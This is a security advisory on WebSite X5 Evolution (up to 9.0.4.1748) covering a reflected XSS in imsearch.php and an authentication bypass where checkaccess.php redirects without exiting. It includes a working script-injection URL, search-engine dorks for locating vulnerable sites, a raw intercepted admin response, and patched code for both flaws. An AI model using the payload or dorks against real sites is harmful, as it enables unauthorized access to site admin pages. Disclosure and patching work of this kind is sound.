Incomedia WebSite X5 Evolution <= 9.0.4.1748 XSS & Auth bypass

=========================================
Vulnerable Software: Incomedia WebSite X5 Evolution <= 9.0.4.1748 (All versions)
Vendor: www.websitex5.com
Vulns: XSS && Auth Bypass
Software License: Commercial
Dork 1: inurl:imsearch.php
Dork 2: intitle:WebSite X5 Manager inurl:/admin/header.php
=========================================


About Software:
==========================================
WebSite X5 Evolution 9 is the most versatile and complete solution you'll find
for creating eye-catching, functional and professional websites, blogs and
online stores.

You'll be surprised at how easy WebSite X5 Evolution 9 is to use, but what is
perhaps most amazing is the sheer power and totality of the features it offers.

http://www.websitex5.com/en/evolution-9.html

*Nice Software and easy to use.*
==========================================

About Vulnerabilities:



[*]                         XSS:             [*]
site.tld/imsearch.php?search="\><script>alert(1);</script>



Fix:

Open imsearch.php and find:

=============VULNERABLE CODE==============

<?php
$search = new imSearch();
$search->search(@$_GET['search'], @$_GET['page']);
?>


==========END OF VULNERABLE CODE==========



                      REPLACE WITH:


==============FIXED CODE====================

<?php
$search = new imSearch();
$search->search(@htmlspecialchars($_GET['search']), htmlspecialchars(@$_GET['page']));
?>

===========END OF FIXED CODE================




[*] Second vulnerability is Authentication Bypass. [*]




Vulnerable code:  site.tld/admin/checkaccess.php

========= BEGIN VULNERABLE CODE ===========


<?php
	require_once("../res/x5engine.php");
	$login = new imPrivateArea();
	if ($login->checkAccess("admin/" . basename($_SERVER['PHP_SELF'])) !== 0) {
		if (basename($_SERVER['HTTP_REFERER']) == "login.php")
			header("Location: login.php?error");
		else
			header("Location: login.php");
	}
	else
		$logged = TRUE;

// End of file checkaccess.php

==========END OF VULNERABLE CODE==========


Notice flaw: Script continues execution.



                            For reproduce:
===============================================

Using Fiddler intercept the traffic from your browser and you will get output from scripts execution.
Print screen:
http://oi47.tinypic.com/f21sf7.jpg

==================== RAW=======================
HTTP/1.1 302 Found
Date: Sun, 25 Nov 2012 01:13:19 GMT
Server: Apache
Set-Cookie: ASPX=pfsnkn5ccps9u15pa0r4of6lodesg6lq; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: login.php
Content-Length: 1188
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it" lang="it" dir="ltr">
<head>
	<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
	<meta http-equiv="Content-Language" content="it" />
	<meta http-equiv="Content-Type-Script" content="text/javascript" />
	<meta http-equiv="ImageToolbar" content="False" />
	<meta name="MSSmartTagsPreventParsing" content="True" />
	<script type="text/javascript" src="../res/jquery.js"></script>
	<script type="text/javascript" src="../res/x5engine.js"></script>
	<link rel="stylesheet" type="text/css" href="template.css" media="screen" />
  <title>WebSite X5 Manager</title>
</head>
<body>
<div id="imAdminPage">
	<div id="imBody">
		<div class="imSectionTitle"></div>
		<div class="imContent">
<div class="imTest pass">&#1042;&#1077;&#1088;&#1089;&#1080;&#1103; PHP: 5.2.17<span>PASS</span></div>
<div class="imTest pass">&#1055;&#1086;&#1076;&#1076;&#1077;&#1088;&#1078;&#1082;&#1072; &#1089;&#1077;&#1089;&#1089;&#1080;&#1080;<span>PASS</span></div>
<div class="imTest pass">&#1055;&#1091;&#1090;&#1100; &#1082; &#1087;&#1091;&#1073;&#1083;&#1080;&#1095;&#1085;&#1086;&#1081; &#1087;&#1072;&#1087;&#1082;&#1077; &#1085;&#1072; &#1089;&#1077;&#1088;&#1074;&#1077;&#1088;&#1077;<span>PASS</span></div>
		</div>
	</div>
</div>
</body>


===============EOF RAW==================



If your checkaccess.php isn't patched every file on /admin/*.php is vulnerable.





Fixed Code:
site.tld/admin/checkaccess.php

==============BEGIN =FIXED CODE=================
<?php
	require_once("../res/x5engine.php");
	$login = new imPrivateArea();
	if ($login->checkAccess("admin/" . basename($_SERVER['PHP_SELF'])) !== 0)
	{
		if (basename($_SERVER['HTTP_REFERER']) == "login.php")
		{
			header("Location: login.php?error");
			exit;
			}

		else
		{
			header("Location: login.php");
			exit;
			}
	}
	else
	{
		$logged = TRUE;
		}

// End of file checkaccess.php

===============END OF FIXED CODE================


**Vendor notified about this advisory.**


================================================
SHOUTZ+RESPECTS+GREAT THANKS TO ALL MY FRIENDS:
================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
exploit-db.com
osvdb.com
websecurity.com.ua

to all Aa Team + to all Azerbaijan Black HatZ
+ *Especially to my bro CAMOUFL4G3 *
           To All Turkish Hackers

Also special thanks to: ottoman38 & HERO_AZE
================================================

/AkaStep